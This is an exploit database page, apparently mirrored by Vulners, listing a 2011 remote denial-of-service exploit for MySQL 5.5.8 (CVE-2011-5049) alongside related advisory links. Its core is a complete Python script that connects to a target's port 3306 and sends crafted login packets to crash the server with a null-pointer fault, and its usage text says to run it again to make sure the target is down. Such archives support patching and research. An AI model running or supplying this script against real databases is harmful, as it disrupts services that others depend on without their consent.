Lucene search
+L

MySQL 5.5.8 - Remote Denial of Service

🗓️ 24 Dec 2011 00:00:00Reported by LevelType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

MySQL 5.5.8 Remote Denial of Service exploit

Related
Code
ReporterTitlePublishedViews
Family
checkpoint_advisories
Check Point Advisories
MySQL Database Null Pointer Denial of Service (CVE-2011-5049)
23 Nov 201400:00
checkpoint_advisories
cve
CVE
CVE-2011-5049
4 Jan 201219:00
cve
cvelist
Cvelist
CVE-2011-5049
4 Jan 201219:00
cvelist
nvd
NVD
CVE-2011-5049
4 Jan 201219:55
nvd
prion
Prion
Null pointer dereference
4 Jan 201219:55
prion
ubuntucve
UbuntuCve
CVE-2011-5049
4 Jan 201219:55
ubuntucve
import socket, sys

print "\n"
print "----------------------------------------------------------------"
print "| MySQL 5.5.8 Null Ptr (windows)                                |"
print "| Level Smash the Stack                                         |"
print "----------------------------------------------------------------"
print "\n"

buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

buf2=("\x11\x00\x00\x00\x03set autocommit30")

def usage():
print "usage : ./mysql.py <victim_ip>"
print "example: ./mysql.py 192.168.1.22"


def main():
if len(sys.argv) != 2:
usage()
sys.exit()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

HOST = sys.argv[1]
PORT = int(3306)
s.connect((HOST,PORT))
print "[*] Connect"
s.send(buf)
print "[*] Payload 1 sent"
s.send(buf2)
print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n"
s.close()

if __name__ == "__main__":
main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Dec 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.04526
33